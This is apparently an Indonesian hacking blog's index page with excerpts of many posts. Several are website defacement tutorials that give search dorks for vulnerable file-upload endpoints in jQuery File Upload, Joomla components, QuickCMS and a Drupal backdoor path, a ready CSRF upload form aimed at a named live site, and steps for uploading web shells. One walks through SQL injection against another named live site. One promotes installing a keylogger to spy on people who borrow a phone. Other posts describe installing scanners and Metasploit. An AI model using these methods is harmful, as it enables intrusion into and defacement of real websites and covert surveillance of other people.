Blood Tears No Team Squad

Yoooo jumpa lagi ma ane :v Kali ini ane bikin tutor cara depes metode Jquery File Upload. Langsung To The Point aja Ea :v Bahan" : 1. Shell ext nya .php.fla atau kalo gk bisa, coba bypass ext shell nya pakek ur brain :v 2. Exploit nya site.co.li/[path]/server/php/ 3. Dork -> inurl:jquery_file_upload/server/php/              -> inurl:manager/server/php/ kembangin lagi viar anu :V 4. CSRF onlene :  uhh

Hay guys.. Kali ini gw bagiin WPSeku: Wordpress Security Scanner . Apa itu WPSeku ? WPSeku adalah tool yang berfungsi untuk menemukan celah keamanan WordPress dan melakukan serangan bruteforce, mungkin tool ini mirip seperti WPScan yang sudah terinstall di kali linux. Berikut cara instalasi dan menggunakan nya. Cara install WPSeku Di Termux Pertama kalian download/install Termux nya dari playstore, lalu ketikkan kode di bawah ini.   $ apt update && apt upgrade $ apt install git python python2 $ git clone https://github.com/m4ll0k/WPSeku  $ cd WPSeku $ chmod 777 wpseku.py $ pip2 install -r requirements.txt Dan untuk menggunakannya kalian bisa lihat di bagian help dengan mengetik $ python2 wpseku.py -h Sekian dari gw Semoga bermanfaat oke oce

Hai guys kali ini wa kasih tutor depes metode Com_Sexy :v Langsung simak aja dah :v Bahan" : DORK inurl:components/com_sexycontactfrom/ inurl:/com_ sexycontactfrom/ (Kembangin lageh :v) Exploit nya : /components/com_sexycontactfrom/fileupload/index.php CSRF : <form method="POST" action="http://bufetecristiani.com.mx/components/com_sexycontactform/fileupload/index.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form> *Save dengan format html. Ganti Url nya dengan web yang mau di deface :v 1. Dorking pakek dork diatas   2. Kalo udah nentuin target, langsung masukin exploit diatas. Contoh site.co.li /components/com_sexycontactfrom/fileupload/index.php 3. Kalo kayak di bwah ini tandanya vuln. Langsung saja buka CSRF tadi. 4. Upload script deface/shell kalian 5. Kalo berhasil tandanya kek gini 6. Akses nya di site.co.li /components/com_sexycontactfrom/file...

Hay guys.. Kali ini gw bakalan bagiin tutorial Deface Dengan JCE Remote File Upload Vulnerability       Dork : - inurl:"/index.php?option=com_jce" Kembangin lagi dengan imajinasi kalian sendiri :v Tools  JCE Remote File Upload Vulnerability nya bisa di download  di sini Pertama kalian nge dork dulu di google atau di bing (terserah kalian :v ) Lalu kalian buka exploiternya yg nama nya jce.exe , dan masukkan target nya Jika Vuln, maka akan muncul kek gini Kalian copas link nya maka akan muncul uploader Tinggal kalian upload shell dan....done :v Sekian dari gw.. Semoga bermanfaat

Hay Guys, Kali ini wa mau kasih tutorial depes metode Filemanager QuickCMS. Langsung simak aja guys :v Siapkan Bahan" nya dolo : Dork : CMS by Quick.Cms - Designed by BITIS & BELLA BITIS (Kembangin lagi viar banyak yg vuln :v) Exploit : site.co.li/ plugins/ckeditor/filemanager/bitis.html Shell : Kalo belum punya bisa donlot  di sini 1. Dorking pakek dork diatas 2. Pilih salah satu target nya 3. Abis dapet target, Masukin exploit nya. Contoh site.co.li/ plugins/ckeditor/filemanager/bitis.html 4. Vuln? Tampilannya bakal kayak gini. Langsung aja upload shell.php abis tuh langsung aja panggil shell nya. 5. Akses nya disini site.co.li /plugins/ckeditor/filemanager/files/nazwij_folder/shell.php . 6. Nah sudah terdeface :v Mudah kan ^.^ Nah sekian tutorial dari saya :v Maap kalau ada salah/kurang jelas :v Thanks :v

Hay guys.. Kali ini gw bagiin tutorial Cara Install Tools Kali Linux Di Android  Kali Linux merupakan salah satu distro linux yg sangat populer, Distro tersebut lebih fokus ke pentest (penetration testing) saja tidak seperti ubuntu yg fokus untuk daily user Kali Linux sendiri sebenarnya sudah tersedia untuk perangkat armhf (arm7) namun tidak semua smartphone akan berjalan lancar ketika menggunakan kali linux karna tidak semua kernel pada android mendukung loop device Nah untuk di sini saya akan coba memberikan panduan cara menginstall tools kali linux di android dengan Gnuroot menggunakan tools yg bernama katoolin Mungkin untuk pengguna ubuntu sudah tidak asing dengan tools katoolin, Katoolin sendiri di bangun dengan bahasa pemerograman python jadi untuk menjalankan katoolin di butuhkan paket python agar dapat berjalan Cara Install Tools Kali Dengan Gnuroot Pertama kalian install/download dulu Gnuroot Debian di playstore, lalu ketikkan kode di bawah ini ...

Hay guys... Kali ini gw nggak bawain tutor deface atau bagiin tools, tapi kali ini gw bagiin tutorial Cara Memasang Keylogger di Android. Apa itu keylogger? Keylogger adalah aplikasi yang bisa merekam aktifitas pengguna komputer. Berasal dari kata kerja “log”. Orang/program yang melakukan aktifitas log ini namanya “logger”. Sedangkan “logging” berarti adalah istilah untuk kegiatan “merekam” aktifitas log-nya terutama dari aktifitas ketikan keyboard nya, dan sangat barguna waktu teman kalian pinjam android kalian, dan kita akan tau apa yg mereka perbuat :v . Cara install Keylogger di android Ingat, Do With Your Own Risk Di sini admin tidak bertanggung jawab jika android kalian bootloop atau hardbrick :v Yang pertama android kalian di wajibkan untuk di root terlebih dahulu, bagaimana cara root? Google 24jam buka mas :v Karena setiap android cara root nya beda - beda. Dan install Xposed Framework nya dulu Download Xposed installer nya di sini . Buka Xpos...

Hay gaes...Kali ini wa bakal ngasih tutor pepes pakek metode  UpDone Check Shell. Langsung aja dah disimak :v POC ini cukup simple kok :v Siapin Bahan" nya 1. Dork : -> intext:UpDone check :/sites/default/files/up.php                -> inurl:/node/ intext:UpDone Check Kembangin lagi :v 2. Exploit nya : /sites/default/files/up.php 3. Shell bekdor (kalo gk punya, donlot disini 1. Dorking pakek dork diatas. Cari" target yang mau di ekse :v 2. Udah nemu target? langsung aja tambahin exploit /sites/default/files/up.php diblakang target. Misal site.co.li/sites/default/files/up.php. Vuln? ciri nya akan tampil kayak dibawah 3. Browse shell bekdor klean trus klik upload. Kalo berhasil, Muncul kek dibawah ini :v    4. Akses shell bekdor klean dengan cara ganti up.php dengan nama shell klean. Contoh : site.co.il/sites/default/files/tot.php 5. Nah akan tampil shell bekdor klean kayak diatas. 6. Terserah dah mau diapain :v Sekian turtor ...

Hay guys.. Kali ini gw bakal bagiin tool viSQL Scan SQL Vulnerability . Apa itu viSQL ? viSQL adalah suatu tools untuk meng-explotasi yang retan terhadap suatu pengujian website atau bisa disebut suatu scanner SQL vlunerability pada suatu situs target dan situs di server yaitu viSQL ini. dan viSQL ini terbuat dari bahasa pemrograman python2. Cara Install viSQL di Termux    $ apt-get update && apt-get upgrade    $ apt-get install git    $ apt-get install python2    $ git clone https://github.com/blackvkng/viSQL    $ cd viSQL    $ chmod 777 viSQL.py Dan untuk menjalankan nya kalian bisa melihat pada bagian help dengan mengetik    $ python2 viSQL.py -h Sekian dari gw... Semoga bermanfaat ^_^ Kalo masih bingung komen di bawah ea

Yo wasap Plen :v kali ini gw mau ngasih turtor cara depes dengan metode sql lokmed manual. Langsung aja lah :v Siapin bahan" dolo : Dork : inurl://statis-1 ext:html (kembangin ea biar dapet perawan, masak dapet janda mulu kan asw :v) ubah angka nya 1-100 terserah ente :v Admin finder : Cari di google atau bisa install di hp klean pakek termux  DI SENE Hashkiller : DI SENE Kopi/Teh/Susu/Es/Tisu bebas dah :v Yok langsung sadja :v 1. Dorking lah pakek dork diatas di mbah gugel :v   2. Pilih salah satu target yang mau di eue :v Nih Live Target buat di EUE :v : http://ciptaabadi.net/statis-1-profil.html 3. Tambahin tanda (') tanpa tanda kurung di akhir kata profil. Contoh kek gini : http://ciptaabadi.net/statis-1-profil'.html Vuln tandanya? Kek dibawah ini 4. Kalau udah kek gitu skarang kita order by buat nyari error :v Contoh : http://ciptaabadi.net/statis-1-profil'+order+by+1--+-.html -> Normal http://ciptaabadi.net/statis-1-profil'+order+by+2--+-.html -> Normal...

Hai guys... Kali ini gw bagiin tools dari bapak kita Yukinoshita47 dari Garuda Security Hacker :v Yaitu Pentest Tools Auto Installer , cocok buat kalian yg Pengen Install tool tanpa harus takut Crash / Kernel Panic dan males untuk install manual satu per-satu hehe Tested On Kali linux Linux Mint GNU Root Debian [ Android ] Fitur Nmap [Network Scanner] ZenMap [Nmap GUI Version] Wireshark [Network Sniffer] W3af [Web Vulnerability Scanner] Nikto [Web Vulnerability Scanner] Whatweb [Web Vulnerability Scanner] John [Password Cracker] PDF-Crack [PDF Password Cracker] FCrackZip [ZIP Password Cracker] Ophcrack [Password Cracker] Volatility [Digital Forensic] Digital Forensic Framework  [Digital Forensic] GHex [Digital Forensic] Aircrack-Ng [Wifi Audit] Ettercap [Network Audit] Yetsinia [Network Audit] Packet Snifer / Spoofing [Network Audit] WafW00f [Web Application Firewall Audit] SSLyze [SSL Audit] Droopescan [Wordpress, Joomla, And Other CMS Auditi...

Hai guys... Setelah kemaren gw bawain Tutorial Install Metasploit di Termux ,   Kali ini gw bagiin tutorial install Metasploit nya di GNU Root Debian , karena nggak semua user android adalah user Termux , maka terjadilah artikel ini :v Yang pertama kalian harus download dulu GNU Root Debian nya di Playstore, lalu ketikkan kode di bawah ini    root@localhost:/# apt-get update && apt-get upgrade    root@localhost:/# apt-get install curl    root@localhost:/# curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall    root@localhost:/# chmod 777 msfinstall    root@localhost:/# ./msfinstall proses download akan langsung berjalan, setelah proses download selesai akan di lanjutkan dengan proses extrak dan di akhiri dengan proses setup konfigurasi yang prosesnya memakan waktu sekitar 10-20 menitan Untuk menjalakan metasploit cukup men...

Social Engineer Toolkit disingkat menjadi SET atau biasa juga di sebut Setoolkit merupakan tools preinstalled (tools bawaan) yg ada pada system operation kali linux Setoolkit sendiri merupakan tools serba bisa mulai dari membuat fake login, sms spoofing, router admin dan sebagainya, Tools ini sendiri di buat oleh trustedsec dan di bangun dengan bahasa pemerograman python Jika kalian pernah menonton serial "Mr. Robot" pada scene ketika elliot akan menerobos masuk ke sebuah gedung (lupa episode berapa) dan ada adegan dimana teman dari elliot mengirimkan sms palsu (sms spoofing) pada penjaga gedung. Tools inilah yg di gunakan pada scene tersebut Dan untuk Cara Menginstall Setoolkit Di Android disini saya menggunakan GNURoot Debian, Sebelumnya pernah coba install setoolkit menggunakan termux tapi selalu gagal waktu proses setup karna proses compile membutuhkan build essentials dan termux hanya menyediakan Clang sebagai compiler, Karna belum nemu untuk fix nya jadi pakai GNURoot a...